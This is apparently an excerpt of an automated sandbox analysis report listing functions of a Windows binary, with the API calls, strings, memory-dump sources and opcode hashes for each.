                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorywsprintf
                                                                                          • String ID: \%s.inf
                                                                                          • API String ID: 4249102397-3360618689
                                                                                          • Opcode ID: a95441a86774613034046c1130e7506e2316dbac1560330ca88992bcf5e6acf4
                                                                                          • Instruction ID: f690894ba55c918ad04e505df1fe68bbf0115b60034b78d10638180a207e1e10
                                                                                          • Opcode Fuzzy Hash: a95441a86774613034046c1130e7506e2316dbac1560330ca88992bcf5e6acf4
                                                                                          • Instruction Fuzzy Hash: 48F0A4B56016089FC724DF68EC49AAAB7F9BF88700F144299E806C3241DA70AE44CAE5
                                                                                          Function 005BC440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,SetSecurityInfo), ref: 005BC454
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC489
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: SetSecurityInfo
                                                                                          • API String ID: 199729137-240378450
                                                                                          • Opcode ID: 9d94cc24abaa73ec62b2b8116bd4542316ba585c85a41a9792729b0c9f05468b
                                                                                          • Instruction ID: 08555942f5b06ab11da0d43818e5581b45a97cc08b49a7e706473f66a6ffa818
                                                                                          • Opcode Fuzzy Hash: 9d94cc24abaa73ec62b2b8116bd4542316ba585c85a41a9792729b0c9f05468b
                                                                                          • Instruction Fuzzy Hash: 04F04F72640218ABCB10CF98E894EE7B7ADEF5C711F04811AFD0993240C634EC50CBA0
                                                                                          Function 005BC350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,BuildExplicitAccessWithNameW), ref: 005BC364
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC391
                                                                                          Strings
                                                                                          • BuildExplicitAccessWithNameW, xrefs: 005BC35E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: BuildExplicitAccessWithNameW
                                                                                          • API String ID: 199729137-2598508172
                                                                                          • Opcode ID: 0cbef77031fbe04fcac1a8b821ba1e437ca58023b147613372d6b43318ec8866
                                                                                          • Instruction ID: 701a91b15ace85d3f76abc52b8c0109c28432f432e68fe7d95e2d7f6edcb31c5
                                                                                          • Opcode Fuzzy Hash: 0cbef77031fbe04fcac1a8b821ba1e437ca58023b147613372d6b43318ec8866
                                                                                          • Instruction Fuzzy Hash: 73F0DA76A40218ABC714DF98E844DABBBE9EB48B51F04C51AF95997241C670EC50DBF0
                                                                                          Function 005AC000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,ConvertStringSecurityDescriptorToSecurityDescriptorW), ref: 005AC014
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005AC03D
                                                                                          Strings
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW, xrefs: 005AC00E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorW
                                                                                          • API String ID: 199729137-4218572124
                                                                                          • Opcode ID: 3b1bd56e1cc0485209bd362eb9910e1f27aa3dd6eeefa78b7c4840ea3f53362c
                                                                                          • Instruction ID: b8fb7587389c3dd40a5caa44d3f7c93f03a561c5f758f1a2a97892c5f24b390b
                                                                                          • Opcode Fuzzy Hash: 3b1bd56e1cc0485209bd362eb9910e1f27aa3dd6eeefa78b7c4840ea3f53362c
                                                                                          • Instruction Fuzzy Hash: 93F0FE72641218ABC720DF98E844A9BB7E9EB48B51F05851AF94597240C671EC10CBF1
                                                                                          Function 005BC3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,SetEntriesInAclW), ref: 005BC404
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC42D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: SetEntriesInAclW
                                                                                          • API String ID: 199729137-3166073420
                                                                                          • Opcode ID: e677d5f8204927561ebf94d7d9200712aded7561b20853643c273b11f73efae7
                                                                                          • Instruction ID: 739e900932bdf1c0d8008a6c2d5b45ed83d81df365aa1e38c45cc856624469da
                                                                                          • Opcode Fuzzy Hash: e677d5f8204927561ebf94d7d9200712aded7561b20853643c273b11f73efae7
                                                                                          • Instruction Fuzzy Hash: 70F08272A40218ABC720DF98E854EA7B7ECEF48B11F00851AFD4A97280C670FC10CBA4
                                                                                          Function 005C2140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,CheckTokenMembership), ref: 005C2154
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C2179
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: CheckTokenMembership
                                                                                          • API String ID: 199729137-412103321
                                                                                          • Opcode ID: 701ce660c13c581b66b596e1563c66d5c44391623c07e5f419113c97bf7d305b
                                                                                          • Instruction ID: 5537679bb210a224179a7d0b47df29750e2fd0b31130eeccbd4612093d744b34
                                                                                          • Opcode Fuzzy Hash: 701ce660c13c581b66b596e1563c66d5c44391623c07e5f419113c97bf7d305b
                                                                                          • Instruction Fuzzy Hash: 90F01C76A40214AFC710DF95D844E9BB7A8EB54751F04C42EF95997650C670A840CBA0
                                                                                          Function 005E91A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(?,x)c,00000000,?,~6^,00632978,?,005E2ECB,00000000,?,005E367E,?), ref: 005E91E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID: x)c$~6^
                                                                                          • API String ID: 3997070919-3358230756
                                                                                          • Opcode ID: 863162501684fb02e644f67b582aec30c37ba7e38f0d586dc9f4c73fd978be78
                                                                                          • Instruction ID: 23983b9802e4a1ca5bce6fe85715c3e442b87fbb2596391e64158860230a8aa5
                                                                                          • Opcode Fuzzy Hash: 863162501684fb02e644f67b582aec30c37ba7e38f0d586dc9f4c73fd978be78
                                                                                          • Instruction Fuzzy Hash: 20F05832C0021DABCF19CF9AEC08ADEBFB9FF88390F048055E954AB150D7749905CBA0
                                                                                          Function 005C21F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005BB080: GetCurrentThreadId.KERNEL32 ref: 005BB08E
                                                                                            • Part of subcall function 005BB080: EnterCriticalSection.KERNEL32(?,?,?,0063C2FC,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB098
                                                                                            • Part of subcall function 005BB080: LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0B8
                                                                                          • LoadStringW.USER32(00000000,?,00000454,00000200), ref: 005C221C
                                                                                          • wsprintfW.USER32 ref: 005C222D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CurrentEnterLeaveLoadStringThreadwsprintf
                                                                                          • String ID: #%d
                                                                                          • API String ID: 3162899704-1734759437
                                                                                          • Opcode ID: 0a9ee2ed620bb28893ad5221aeb504fa4ab631b40ca69254456f0f19d77fdeba
                                                                                          • Instruction ID: ca249045243308bf083c08e42089e7ecfed6f76b5cbd8b1470808eb81784fab3
                                                                                          • Opcode Fuzzy Hash: 0a9ee2ed620bb28893ad5221aeb504fa4ab631b40ca69254456f0f19d77fdeba
                                                                                          • Instruction Fuzzy Hash: FAE092217002157BD6202BA69C1DFAB7F6EEFC2BA4F040026F608E7152E5A0A541C3E8
                                                                                          Function 005BC3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,ConvertStringSidToSidW), ref: 005BC3B4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC3D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: ConvertStringSidToSidW
                                                                                          • API String ID: 199729137-806449257
                                                                                          • Opcode ID: cfe732c5049d2e59e2f52cf029712c3b5017b25fe03b9b699f4dc5c02623a604
                                                                                          • Instruction ID: c022c2345ec10d111d7796b3da8a4491dd650d85b493cb6009cf9a1bbde18c6d
                                                                                          • Opcode Fuzzy Hash: cfe732c5049d2e59e2f52cf029712c3b5017b25fe03b9b699f4dc5c02623a604
                                                                                          • Instruction Fuzzy Hash: ECE06532A402145BC720DFA5D844A97FBF8EF64711F04891BF98597241C670FC44CBE0
                                                                                          Function 005E29B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 005E29C4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005E29E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: IsWow64Process
                                                                                          • API String ID: 199729137-777008139
                                                                                          • Opcode ID: a5e24785c9d3229381f30dca7f31b38b9f21fcdb9967ad8c18e74d29d7de37e3
                                                                                          • Instruction ID: e123291399f104c708bcffd3bf77f7c2906dd21983ca271f2677b680d2379e07
                                                                                          • Opcode Fuzzy Hash: a5e24785c9d3229381f30dca7f31b38b9f21fcdb9967ad8c18e74d29d7de37e3
                                                                                          • Instruction Fuzzy Hash: E0E06532A412245FC7649F94D945A97F7DCFB54B11F04A41BF985D7640C670F840CBE0
                                                                                          Function 005C20C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005C20D4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C20F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: GetDpiForWindow
                                                                                          • API String ID: 199729137-4136707520
                                                                                          • Opcode ID: 4e4043edae58e85d002012f8f0e538fb051a5cadb1170c4f32ebfad942107955
                                                                                          • Instruction ID: 2eab191871d20b2608d72c4e7393c308d9b59cb3f670bd6fa32a9c5e8d0d9adc
                                                                                          • Opcode Fuzzy Hash: 4e4043edae58e85d002012f8f0e538fb051a5cadb1170c4f32ebfad942107955
                                                                                          • Instruction Fuzzy Hash: A2E01272A403249FC720DBE9D808A9AFBD9EF14765F05842BE54597640D6B9A840CFA0
                                                                                          Function 005C2100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005C2111
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C2127
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: GetDpiForSystem
                                                                                          • API String ID: 199729137-3023621526
                                                                                          • Opcode ID: eadbb56ec591c40362405477ffc254e03fce789b72b7e738a51c0dcb1252a927
                                                                                          • Instruction ID: 0e3ef9902a648f7d95107b092df2010d92617ac703e076f901e30746a649b529
                                                                                          • Opcode Fuzzy Hash: eadbb56ec591c40362405477ffc254e03fce789b72b7e738a51c0dcb1252a927
                                                                                          • Instruction Fuzzy Hash: 4BE0EC31D446249FC7609FB9A858BC6BBE5FF08711F0A855EE985D7640C774AC40CB90
                                                                                          Function 005B46A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005B46C9
                                                                                          Strings
                                                                                          • m_hKey != NULL, xrefs: 005B46B5
                                                                                          • e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp, xrefs: 005B46B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete
                                                                                          • String ID: e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp$m_hKey != NULL
                                                                                          • API String ID: 1035893169-214662663
                                                                                          • Opcode ID: e40808e4b6c132723c63f102b0ffd7657f03c28bdbf104416349f19c3e39adda
                                                                                          • Instruction ID: cd6cbfe45774e39fabd2733b6aa9e39bd1b67758091bbc3be9179be0f43b47c3
                                                                                          • Opcode Fuzzy Hash: e40808e4b6c132723c63f102b0ffd7657f03c28bdbf104416349f19c3e39adda
                                                                                          • Instruction Fuzzy Hash: EBD05B75650314ABD3145A54DC15ED27B5EAB54711F04413AFD4052181EAB2EC80CEA5
                                                                                          Function 005AC5B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: ipc %s@%u$no error
                                                                                          • API String ID: 2111968516-3872069982
                                                                                          • Opcode ID: 563013c8817d4a4a9190e3f99d5008e40c9a289bdd75f681c8e9e204678d88db
                                                                                          • Instruction ID: b31ddfaf0cfeed604f009d2f703159486e36c09770ddb819b2c001df7792ad43
                                                                                          • Opcode Fuzzy Hash: 563013c8817d4a4a9190e3f99d5008e40c9a289bdd75f681c8e9e204678d88db
                                                                                          • Instruction Fuzzy Hash: A3E012705802055BD3109F59C814BA67B99FB54714F08803AB818EA341E676E4518764
                                                                                          Function 005D4250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,True,?), ref: 005D4270
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringWrite
                                                                                          • String ID: False$True
                                                                                          • API String ID: 390214022-1895882422
                                                                                          • Opcode ID: be2f7179098b572b22662e604fb8a3209224d23c13b263f76b26f57e51cdb5ff
                                                                                          • Instruction ID: 7bb478f76465e3871ad2e475073cd827febae7940273f1d065472eece4b239fd
                                                                                          • Opcode Fuzzy Hash: be2f7179098b572b22662e604fb8a3209224d23c13b263f76b26f57e51cdb5ff
                                                                                          • Instruction Fuzzy Hash: 4CD09EB551810DAFDB10CF88D859BA737ADE784710F008515F91887340C770ED508BE1